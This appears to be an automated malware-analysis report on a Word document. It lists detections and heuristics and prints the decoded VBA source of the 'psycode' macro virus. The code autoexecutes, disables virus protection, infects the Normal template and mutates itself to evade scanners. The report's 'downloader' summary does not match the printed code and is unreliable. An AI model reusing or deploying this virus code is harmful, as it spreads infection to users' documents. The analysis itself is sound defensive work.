MALICIOUS
280
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a legacy Word document containing multiple VBA macros, including autoexecuting ones like AutoOpen and Document_Open. These macros are designed to execute arbitrary code, as indicated by the ClamAV detections 'Doc.Trojan.Psy-1' and 'Win.Trojan.W-420'. The VBA code attempts to obfuscate its actions and modify the document's code, suggesting it's a downloader for a secondary stage.
Heuristics 6
-
ClamAV: Doc.Trojan.Psy-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Psy-1
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15433 bytes |
SHA-256: babb2c25c85b088e79b423422b193ca9f63bda486fd71489c44fa48bafa9e3e7 |
|||
|
Detection
ClamAV:
Win.Trojan.W-420
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "ThisDocument1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub autoopen(): psycode: End Sub
Private Sub document_open(): psycode: End Sub
Private Sub autoclose(): psycode: End Sub
Private Sub document_close(): psycode: End Sub
Private Sub psycode()
Application.ShowVisualBasicEditor = 0
If Len(ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.lines(1, 5)) <> Len(NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.lines(1, 5)) Then ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines: psycodeX
End Sub
Private Sub psycodeX()
On Error Resume Next
Options.VirusProtection = 0: EnableCancelKey = 0
With NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
newcode
ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromString (.lines(.ProcStartLine("autoexec", 0), .CountOfLines - .ProcStartLine("autoexec", 0) + 1))
ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromString (.lines(1, 4))
End With
With ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
.replaceline .ProcStartLine("autoexec", 0), "private sub psycode"
For x = .CountOfLines - 8 To .CountOfLines
crap = ""
For y = 0 To 20 + Int(Rnd * 20)
crap = crap & Chr$(32 + Int(Rnd * 224))
Next y
.replaceline x, .lines(x, 1) & "'" & crap
Next x
End With
With ActiveDocument
.SaveAs .FullName
End With
End Sub
Private Sub newcode()
With NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
c = (128 + Int(Rnd * 128))
.replaceline .ProcStartLine("autoexec", 0) + 1, "c=" & c
.replaceline .ProcStartLine("autoexec", 0) + 2, "a1=" & Chr$(34) & Chr$(34)
.replaceline .ProcStartLine("autoexec", 0) + 3, "a2=" & Chr$(34) & Chr$(34)
.replaceline .ProcStartLine("autoexec", 0) + 4, "a3=" & Chr$(34) & Chr$(34)
.replaceline .ProcStartLine("autoexec", 0) + 5, "a4=" & Chr$(34) & Chr$(34)
s = UCase$(.lines(1, (.CountOfLines)))
For k = 1 To Len(s)
t = Mid$(s, k, 1)
If Asc(t) < 90 And Asc(t) > 65 Then t = Chr$(Asc(t) + Int(Rnd * 2) * 32)
p = p & t
Next k
For x = 1 To Len(p): b = b & Chr$(Asc(Mid$(p, x, 1)) Xor c): Next x
.replaceline .ProcStartLine("autoexec", 0) + 2, "a1=" & Chr$(34) & Mid$(b, 1, 1016) & Chr$(34)
.replaceline .ProcStartLine("autoexec", 0) + 3, "a2=" & Chr$(34) & Mid$(b, 1017, 1016) & Chr$(34)
.replaceline .ProcStartLine("autoexec", 0) + 4, "a3=" & Chr$(34) & Mid$(b, 2033, 1016) & Chr$(34)
.replaceline .ProcStartLine("autoexec", 0) + 5, "a4=" & Chr$(34) & Mid$(b, 3049) & Chr$(34)
End With
End Sub
Private Sub autoquit()
newcode
With NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
.DeleteLines 1, .ProcStartLine("autoexec", 0) - 1
End With
NormalTemplate.Save
End Sub
Private Sub toolsoptions()
Options.VirusProtection = 1
Dialogs(974).Show
Options.VirusProtection = 1
End Sub
Private Sub viewvbcode()
If Day(Now()) <> 28 Or Month(Now()) <> 51 Then GoTo bye
a = "psycode v?.?? may 28 1999"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Control Panel\Screen Saver.Marquee", "Text") = a
With Assistant
.Visible = 1
.Animation = 25
With Assistant.NewBalloon
.Heading = a
.Show
End With
.Visible = 0
End With
bye: End Sub
Private Sub autoexec()
c = 0
a1 = ""
a2 = ""
a3 = ""
a4 = ""
a = a1 & a2 & a3 & a4
For x = 1 To Len(a)
b = b & Chr$(Asc(Mid$(a, x, 1)) Xor c)
Next x
With NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
.DeleteLines 1, .CountOfLines
.AddFromString b
End With
End Sub
' Processing file: /opt/analyzer/scan_staging/77901a650a394b50aa0080e06b5586db.bin
' ========
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.